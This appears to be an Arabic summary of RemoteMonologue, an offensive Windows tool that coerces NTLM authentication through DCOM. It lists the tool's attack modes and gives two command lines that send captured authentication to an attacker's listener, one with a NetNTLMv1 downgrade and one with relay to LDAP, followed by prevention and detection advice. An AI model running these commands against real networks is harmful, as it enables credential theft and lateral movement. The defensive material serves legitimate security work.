
تسليح DCOM لإجبار مصادقات NTLM
RemoteMonologue هي تقنية لجمع بيانات الاعتماد في ويندوز تتيح اختراق المستخدمين عن بُعد عبر استغلال مفتاح Interactive User RunAs وإجبار مصادقات NTLM من خلال DCOM.
اقرأ مقال X-Force Red RemoteMonologue: تسليح DCOM لإجبار مصادقات NTLM للحصول على معلومات مفصلة.
🔹 إجبار المصادقة عبر DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) لتحفيز مصادقة NTLM ضد مستمع محدد (-auth-to).🔹 رش بيانات الاعتماد (-spray)
🔹 هجوم تخفيض مستوى NetNTLMv1 (-downgrade)
🔹 استغلال خدمة WebClient (-webclient)
🔹 تعداد المستخدمين (-query)
ملاحظة: يلزم امتيازات المسؤول المحلي على النظام الهدف.
pip install impacket
فيما يلي مثال على تشغيل RemoteMonologue مع هجوم تخفيض مستوى NetNTLMv1 أثناء استخدام Responder كمستمع. بشكل افتراضي، إذا لم يتم تحديد خيار DCOM، تستخدم الأداة كائن DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

فيما يلي مثال آخر، هذه المرة يتم تنفيذ الهجوم باستخدام كائن DCOM FileSystemImage وتمكين خدمة WebClient للحصول على مصادقة HTTP، والتي يتم بعد ذلك ترحيلها إلى LDAP باستخدام ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

للحماية من هذه التقنيات واكتشافها، هناك العديد من الإجراءات الوقائية والكشفية التي يمكن تنفيذها.
الإجراءات الوقائية:
تفعيل توقيع LDAP وربط القنوات: قم بتكوين فرض توقيع LDAP وربط القنوات على وحدات تحكم المجال لحماية نقطة نهاية LDAP من هجمات الترحيل. ملاحظة: سيتم فرض هذه الإعدادات افتراضيًا بدءًا من Windows Server 2025.
الترقية إلى أحدث إصدارات ويندوز: قم بترقية الخوادم إلى Windows Server 2025 ومحطات العمل إلى Windows 11 الإصدار 24H2 للتخفيف من هجمات تخفيض مستوى NetNTLM، حيث تمت إزالة NTLMv1 في هذه الإصدارات.
فرض توقيع SMB: قم بتمكين وفرض توقيع SMB على خوادم ويندوز لمنع هجمات ترحيل SMB.
تنفيذ سياسات كلمات مرور قوية: فرض متطلبات كلمات مرور قوية لجعل هجمات كسر كلمات المرور أكثر صعوبة.
فرص الكشف:
مراقبة الوصول عن بُعد إلى كائنات DCOM: تتبع الوصول إلى كائنات DCOM المتأثرة وخصائصها وأساليبها المحددة لتحديد النشاط غير المعتاد.
مراقبة تعديلات السجل: راقب التغييرات على مفاتيح التسجيل RunAs وLmCompatibilityLevel.
تتبع نشاط خدمة WebClient: راقب الحالات التي يتم فيها تمكين خدمة WebClient عن بُعد، حيث يُستخدم ذلك لتسهيل مصادقات NTLM المستندة إلى HTTP.